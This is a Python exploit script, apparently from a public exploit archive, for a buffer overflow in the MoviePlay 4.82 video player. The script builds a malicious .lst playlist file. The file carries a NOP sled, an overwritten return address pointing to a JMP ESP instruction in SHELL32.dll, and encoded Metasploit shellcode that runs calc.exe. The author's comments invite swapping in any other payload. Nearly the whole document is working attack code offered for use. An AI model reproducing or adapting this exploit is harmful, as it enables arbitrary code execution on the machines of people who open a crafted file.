#!/usr/bin/env python # MoviePlay 4.82 (.lst) Buffer Overflow # Author: sickness # Download : http://www.softpedia.com/get/Multimedia/Video/Video-Players/MoviePlay.shtml # Previous version exploit can be found here: http://www.exploit-db.com/exploits/4051/ # Tested : Windows XP Professional SP3 (EN) latest updates with IE8 # DATE : 10/02/2011 ################################################################### # You might need to change the EIP address # The payload can be replaced with whatever you want, there is enough space. ################################################################### begin = "\x5b\x4d\x6f\x76\x69\x65\x50\x6c\x61\x79\x5d\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x30\x3d\x43\x3a\x5c" junk = '\x90' * 1085 eip = '\xD7\x30\x9D\x7C' # JMP ESP SHELL32.dll nops = '\x90'*16 # msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -t c sc = ("\xbe\x41\x9e\x4e\xd0\x33\xc9\xda\xd7\xd9\x74\x24\xf4\xb1\x33" "\x58\x31\x70\x10\x83\xe8\xfc\x03\x31\x92\xac\x25\x4d\x42\xb9" "\xc6\xad\x93\xda\x4f\x48\xa2\xc8\x34\x19\x97\xdc\x3f\x4f\x14" "\x96\x12\x7b\xaf\xda\xba\x8c\x18\x50\x9d\xa3\x99\x54\x21\x6f" "\x59\xf6\xdd\x6d\x8e\xd8\xdc\xbe\xc3\x19\x18\xa2\x2c\x4b\xf1" "\xa9\x9f\x7c\x76\xef\x23\x7c\x58\x64\x1b\x06\xdd\xba\xe8\xbc" "\xdc\xea\x41\xca\x97\x12\xe9\x94\x07\x23\x3e\xc7\x74\x6a\x4b" "\x3c\x0e\x6d\x9d\x0c\xef\x5c\xe1\xc3\xce\x51\xec\x1a\x16\x55" "\x0f\x69\x6c\xa6\xb2\x6a\xb7\xd5\x68\xfe\x2a\x7d\xfa\x58\x8f" "\x7c\x2f\x3e\x44\x72\x84\x34\x02\x96\x1b\x98\x38\xa2\x90\x1f" "\xef\x23\xe2\x3b\x2b\x68\xb0\x22\x6a\xd4\x17\x5a\x6c\xb0\xc8" "\xfe\xe6\x52\x1c\x78\xa5\x38\xe3\x08\xd3\x05\xe3\x12\xdc\x25" "\x8c\x23\x57\xaa\xcb\xbb\xb2\x8f\x24\xf6\x9f\xb9\xac\x5f\x4a" "\xf8\xb0\x5f\xa0\x3e\xcd\xe3\x41\xbe\x2a\xfb\x23\xbb\x77\xbb" "\xd8\xb1\xe8\x2e\xdf\x66\x08\x7b\xbc\xe9\x9a\xe7\x6d\x8c\x1a" "\x8d\x71") exploit = junk + eip + nops + sc rest = '\x90'*(2000-len(exploit)) end="\x2e\x6d\x70\x33\x0d\x0a\x46\x69\x6c\x65\x4e\x61\x6d\x65\x31\x3d\x0d\x0a\x4e\x75\x6d\x46\x69\x6c\x65\x73\x3d\x31\x0d\x0a" try: f = open("evil.lst","w"); f.write(begin+exploit+rest+end) f.close() print "Done!" except: print "Something went wront!"